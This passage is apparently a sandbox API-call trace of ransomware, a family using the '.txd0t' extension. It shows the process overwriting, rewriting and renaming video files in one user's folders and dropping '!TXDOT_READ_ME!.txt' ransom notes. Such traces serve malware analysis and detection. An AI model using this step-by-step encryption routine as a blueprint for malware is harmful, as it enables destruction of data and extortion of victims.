lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x14f60, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x14f60, lpOverlapped=0x0) returned 1 [0076.790] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeb0a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.790] WriteFile (in: hFile=0x46c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x14f60, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x14f60, lpOverlapped=0x0) returned 1 [0076.790] FlushFileBuffers (hFile=0x46c) returned 1 [0076.792] GetProcessHeap () returned 0xe30000 [0076.792] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0076.792] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" [0076.792] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4") returned="GsXmIOztESVB3CY.mp4" [0076.792] StrCpyW (in: psz1=0xe9d786, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.792] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned 1 [0076.792] GetProcessHeap () returned 0xe30000 [0076.792] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0076.792] CloseHandle (hObject=0x46c) returned 1 [0076.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\gsxmioztesvb3cy.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\gsxmioztesvb3cy.mp4.txd0t")) returned 1 [0076.795] SetEvent (hEvent=0x3f8) returned 1 [0076.796] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.799] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" [0076.799] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t" [0076.799] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t") returned 0 [0076.799] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi", dwFileAttributes=0x80) returned 1 [0076.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" (normalized: "c:\\users\\fd1hvy\\videos\\jbkr3ata90b5u.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.800] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=8136) returned 1 [0076.800] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.800] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.801] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffde38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.801] ReadFile (in: hFile=0x46c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1fc0, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x1fc0, lpOverlapped=0x0) returned 1 [0076.801] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffe040, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.801] WriteFile (in: hFile=0x46c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1fc0, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x1fc0, lpOverlapped=0x0) returned 1 [0076.801] FlushFileBuffers (hFile=0x46c) returned 1 [0076.803] GetProcessHeap () returned 0xe30000 [0076.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecfcd8 [0076.803] StrCpyW (in: psz1=0xecfcd8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" [0076.803] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi") returned="JbkR3ATa90b5U.avi" [0076.803] StrCpyW (in: psz1=0xecfd0e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.803] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned 1 [0076.804] GetProcessHeap () returned 0xe30000 [0076.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfcd8 | out: hHeap=0xe30000) returned 1 [0076.804] CloseHandle (hObject=0x46c) returned 1 [0076.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi" (normalized: "c:\\users\\fd1hvy\\videos\\jbkr3ata90b5u.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\JbkR3ATa90b5U.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\jbkr3ata90b5u.avi.txd0t")) returned 1 [0076.805] SetEvent (hEvent=0x3f8) returned 1 [0076.805] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.807] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" [0076.807] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t" [0076.808] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t") returned 0 [0076.808] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv", dwFileAttributes=0x80) returned 1 [0076.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\9t0zt_40.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0076.808] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=56035) returned 1 [0076.808] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.808] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.809] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff231d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.809] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xdae0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xdae0, lpOverlapped=0x0) returned 1 [0076.810] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff2520, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.810] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xdae0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xdae0, lpOverlapped=0x0) returned 1 [0076.810] FlushFileBuffers (hFile=0x468) returned 1 [0076.813] GetProcessHeap () returned 0xe30000 [0076.813] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed2f30 [0076.813] StrCpyW (in: psz1=0xed2f30, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" [0076.813] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv") returned="9t0zT_40.mkv" [0076.813] StrCpyW (in: psz1=0xed2f7e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.813] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned 0 [0076.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.813] WriteFile (in: hFile=0x460, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0076.815] FlushFileBuffers (hFile=0x460) returned 1 [0076.817] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0076.817] FlushFileBuffers (hFile=0x460) returned 1 [0076.818] CloseHandle (hObject=0x460) returned 1 [0076.819] GetProcessHeap () returned 0xe30000 [0076.819] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2f30 | out: hHeap=0xe30000) returned 1 [0076.819] CloseHandle (hObject=0x468) returned 1 [0076.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\9t0zt_40.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\9t0zt_40.mkv.txd0t")) returned 1 [0076.821] SetEvent (hEvent=0x3f8) returned 1 [0076.821] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.825] StrCpyW (in: psz1=0x37ff430, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" [0076.825] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t" [0076.825] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t") returned 0 [0076.825] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf", dwFileAttributes=0x80) returned 1 [0076.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\jifxrs4kga26s8zb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0076.825] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=19111) returned 1 [0076.825] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.826] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.826] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffb359, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.826] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x4aa0, lpNumberOfBytesRead=0x37ff3f0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3f0*=0x4aa0, lpOverlapped=0x0) returned 1 [0076.827] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffb560, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.827] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x4aa0, lpNumberOfBytesWritten=0x37ff3f4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3f4*=0x4aa0, lpOverlapped=0x0) returned 1 [0076.827] FlushFileBuffers (hFile=0x47c) returned 1 [0076.830] GetProcessHeap () returned 0xe30000 [0076.830] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x154) returned 0xeca148 [0076.830] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" [0076.830] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf") returned="JifxRs4kGA26s8ZB.swf" [0076.830] StrCpyW (in: psz1=0xeca1cc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.830] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt") returned 0 [0076.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0076.830] WriteFile (in: hFile=0x464, lpBuffer=0x37ff424*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x37ff424*, lpNumberOfBytesWritten=0x37ff420*=0x2, lpOverlapped=0x0) returned 1 [0076.831] FlushFileBuffers (hFile=0x464) returned 1 [0076.833] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff420*=0x7f0, lpOverlapped=0x0) returned 1 [0076.834] FlushFileBuffers (hFile=0x464) returned 1 [0076.835] CloseHandle (hObject=0x464) returned 1 [0076.835] GetProcessHeap () returned 0xe30000 [0076.835] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0076.835] CloseHandle (hObject=0x47c) returned 1 [0076.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\jifxrs4kga26s8zb.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\jifxrs4kga26s8zb.swf.txd0t")) returned 1 [0076.837] SetEvent (hEvent=0x3f8) returned 1 [0076.837] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.838] StrCpyW (in: psz1=0x37ff430, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" [0076.838] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t" [0076.838] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t") returned 0 [0076.838] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi", dwFileAttributes=0x80) returned 1 [0076.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\smx5xobo64h xqo8uv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0076.839] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=58710) returned 1 [0076.839] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.839] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.840] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff18aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.840] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xe550, lpNumberOfBytesRead=0x37ff3f0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3f0*=0xe550, lpOverlapped=0x0) returned 1 [0076.841] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1ab0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.841] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xe550, lpNumberOfBytesWritten=0x37ff3f4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3f4*=0xe550, lpOverlapped=0x0) returned 1 [0076.841] FlushFileBuffers (hFile=0x47c) returned 1 [0076.845] GetProcessHeap () returned 0xe30000 [0076.845] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x158) returned 0xeca148 [0076.845] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" [0076.845] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi") returned="smX5XObO64h XQO8UV.avi" [0076.845] StrCpyW (in: psz1=0xeca1cc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.845] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt") returned 1 [0076.845] GetProcessHeap () returned 0xe30000 [0076.845] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0076.845] CloseHandle (hObject=0x47c) returned 1 [0076.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\smx5xobo64h xqo8uv.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\ofxv0mmpkk_\\a w2nq\\0ll0qucyfiyhkhker r\\smx5xobo64h xqo8uv.avi.txd0t")) returned 1 [0076.851] SetEvent (hEvent=0x3f8) returned 1 [0076.851] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.852] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf" [0076.852] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t" [0076.852] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t") returned 0 [0076.852] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf", dwFileAttributes=0x80) returned 1 [0076.852] 